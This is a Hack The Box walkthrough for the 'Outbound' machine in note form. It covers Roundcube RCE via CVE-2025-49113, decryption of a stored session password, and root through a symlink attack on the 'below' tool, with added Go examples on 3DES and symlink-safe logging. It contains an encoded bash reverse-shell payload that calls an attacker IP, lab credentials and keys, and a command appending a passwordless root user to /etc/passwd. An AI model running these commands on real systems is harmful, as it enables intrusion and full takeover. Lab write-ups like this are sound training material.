
Outbound

  • Hack The Box

  • nmap gives 80/tcp open http nginx 1.24.0 (Ubuntu)

[!hint] From machine info: CVE-2025-49113 - post-authenticated remote code execution in Roundcube via PHP object deserialization -> FearsOff research ~~RCE PoC~~ CVE-2025-49113 - Roundcube Remote Code Execution; along the way, discovered an amazing tool: Penelope. CVE-2025-27591 - symlink attack in /var/log/below/error_root.log. Internal tool called decrypt.sh: with it we can extract the plaintext value of the password, which allows access to Roundcube as Jacob.

php CVE-2025-49113.php http://mail.outbound.htb tyler LhKL1o9Nm3X2 "printf KGJhc2ggPiYgL2Rldi90Y3AvMTAuMTAuMTUuMTI5LzQ0NDQgMD4mMSkgJg==|base64 -d|bash"

-> payload from penelope

[!fix]: Rewrite in nim/rust/go/zig? or fix this - zwique exp.py

  • search in www-data@mail:/var/www/html/roundcube/config and get the DB credentials from config.inc.php: $config['db_dsnw'] = 'mysql://roundcube:RCDBPass2025@localhost/roundcube'; + the encryption key: $config['des_key'] = 'rcmail-!24ByteDESkey*Str';
  • enumerate databases - mysql -u roundcube -pRCDBPass2025 -e "show databases;" -> roundcube
  • get the base64-encoded vars from the session table -> decode and get the encrypted password

Password decryption

  • via /var/www/html/roundcube/bin/decrypt.sh
  • (from oxdf write-up) via python + CyberChef:

```python
>>> from base64 import b64decode
>>> iv_ct = b64decode('hcVCSNXOYgUXvhArn1a1OHJtDck+CFME')
# decoded into raw bytes; the result is 24 bytes (hex):
# 85 c5 42 48 d5 ce 62 05 17 be 10 2b 9f 56 b5 38 72 6d 0d c9 3e 08 53 04
>>> iv = iv_ct[:8]  # first 8 bytes: Initialization Vector, the "random nudge" that keeps identical messages from producing identical ciphertext
>>> ct = iv_ct[8:]  # everything after: the ciphertext
>>> iv.hex()
'85c54248d5ce6205'
>>> ct.hex()
'17be102b9f56b538726d0dc93e085304'
# from here use the key and CyberChef
```

  • all in CyberChef
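The split above is the whole trick: the session value is base64( IV(8 bytes) || 3DES-CBC ciphertext ), and des_key from config.inc.php is the only secret, so anyone who can read the config and the session table recovers the plaintext. The following Go program is an added example (not from these notes, oxdf's write-up or Roundcube itself) that reproduces the IV split on the blob quoted above and then does a full encrypt/decrypt round trip with a constructed key. It assumes PKCS#7 padding (OpenSSL's default) and uses only the Go standard library; the page's blob is only split, never decrypted here.

```go
package main

import (
	"bytes"
	"crypto/cipher"
	"crypto/des"
	"crypto/rand"
	"encoding/base64"
	"encoding/hex"
	"errors"
	"fmt"
)

// DemoKey is a constructed 24-byte key for the round trip; it is not the box's des_key.
var DemoKey = []byte("example-24-byte-3des-key")

// PageBlob is the session value quoted in the notes; it is only split here.
const PageBlob = "hcVCSNXOYgUXvhArn1a1OHJtDck+CFME"

// pkcs7Pad pads to whole 8-byte blocks (assumed padding scheme, OpenSSL's default).
func pkcs7Pad(b []byte, size int) []byte {
	n := size - len(b)%size
	return append(append([]byte{}, b...), bytes.Repeat([]byte{byte(n)}, n)...)
}

// pkcs7Unpad strips and validates the padding; a wrong key normally fails here.
func pkcs7Unpad(b []byte, size int) ([]byte, error) {
	if len(b) == 0 || len(b)%size != 0 {
		return nil, errors.New("padded data is not whole blocks")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > size {
		return nil, errors.New("bad padding length")
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return nil, errors.New("bad padding bytes")
		}
	}
	return b[:len(b)-n], nil
}

// SplitIV reproduces the notes' split: base64 decode, first 8 bytes IV, rest ciphertext.
func SplitIV(b64 string) (ivHex, ctHex string, err error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", "", err
	}
	if len(raw) < 2*des.BlockSize || len(raw)%des.BlockSize != 0 {
		return "", "", fmt.Errorf("blob is %d bytes; expected 8-byte IV plus whole 8-byte blocks", len(raw))
	}
	return hex.EncodeToString(raw[:des.BlockSize]), hex.EncodeToString(raw[des.BlockSize:]), nil
}

// EncryptSessionValue builds base64( IV || 3DES-CBC(pkcs7(clear)) ) with a fresh random IV.
func EncryptSessionValue(key []byte, clear string) (string, error) {
	block, err := des.NewTripleDESCipher(key)
	if err != nil {
		return "", err
	}
	iv := make([]byte, des.BlockSize)
	if _, err := rand.Read(iv); err != nil {
		return "", err
	}
	padded := pkcs7Pad([]byte(clear), des.BlockSize)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	return base64.StdEncoding.EncodeToString(append(iv, ct...)), nil
}

// DecryptSessionValue is the inverse: key plus blob gives the plaintext back.
func DecryptSessionValue(key []byte, b64 string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	if len(raw) < 2*des.BlockSize || len(raw)%des.BlockSize != 0 {
		return "", errors.New("blob is not IV plus whole blocks")
	}
	block, err := des.NewTripleDESCipher(key)
	if err != nil {
		return "", err
	}
	iv, ct := raw[:des.BlockSize], raw[des.BlockSize:]
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	clear, err := pkcs7Unpad(pt, des.BlockSize)
	if err != nil {
		return "", err
	}
	return string(clear), nil
}
```

A blob that is not an 8-byte IV plus whole blocks is rejected before any cipher call, and a wrong key fails at padding validation (or returns garbage), which is the behaviour a decrypt tool should have rather than silently printing bytes.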

  • login with this password to the jacob account (web) and get the ssh password from the mails

  • use CVE-2025-27591 - symlink /etc/passwd -> /var/log/below/error_root.log, rerun below, and /etc/passwd is now writable: echo -e 'idapp::0:0:idapp:/root:/bin/bash\n' >> /etc/passwd
  • su - idapp ⚐ ◝(ᵔᗜᵔ)◜
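The root-cause of the last step is a privileged process that opens its log path by name and follows whatever sits there. The Go program below is an added example (not from these notes or from below) showing the fragile pattern next to the hardened one: O_NOFOLLOW makes the kernel fail the open with ELOOP when the final path component is a symlink, and checking the already-opened descriptor avoids an lstat-then-open race. It assumes a Linux/Unix host (syscall.O_NOFOLLOW, syscall.ELOOP) and uses only the standard library.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"syscall"
)

// AppendLogFollowingLinks is the fragile pattern: os.OpenFile follows a symlink
// at path, so a planted link redirects the write to the link's target.
func AppendLogFollowingLinks(path, line string) error {
	f, err := os.OpenFile(path, os.O_WRONLY|os.O_APPEND|os.O_CREATE, 0o600)
	if err != nil {
		return err
	}
	defer f.Close()
	_, err = f.WriteString(line + "\n")
	return err
}

// AppendLogNoFollow refuses to follow a symlink in the final path component
// (the kernel returns ELOOP) and then inspects the opened descriptor itself,
// so the check and the write apply to the same file.
func AppendLogNoFollow(path, line string) error {
	f, err := os.OpenFile(path, os.O_WRONLY|os.O_APPEND|os.O_CREATE|syscall.O_NOFOLLOW, 0o600)
	if err != nil {
		if errors.Is(err, syscall.ELOOP) {
			return fmt.Errorf("refusing to write %s: path is a symlink", path)
		}
		return err
	}
	defer f.Close()
	fi, err := f.Stat()
	if err != nil {
		return err
	}
	if !fi.Mode().IsRegular() {
		return fmt.Errorf("refusing to write %s: not a regular file", path)
	}
	_, err = f.WriteString(line + "\n")
	return err
}

func main() {
	// Constructed demo in a temp dir: a "log" that is really a link to another file.
	dir, err := os.MkdirTemp("", "nofollow-demo")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(dir)
	target := dir + "/target"
	link := dir + "/error_root.log"
	if err := os.WriteFile(target, []byte("original\n"), 0o600); err != nil {
		panic(err)
	}
	if err := os.Symlink(target, link); err != nil {
		panic(err)
	}
	fmt.Println("following links:", AppendLogFollowingLinks(link, "entry"))
	fmt.Println("no-follow:", AppendLogNoFollow(link, "entry"))
}
```

The hardened writer keeps the directory containing the log out of reach as well in practice (a log directory writable by an unprivileged user defeats any per-file check), but the per-open guard above is the part the code itself can enforce.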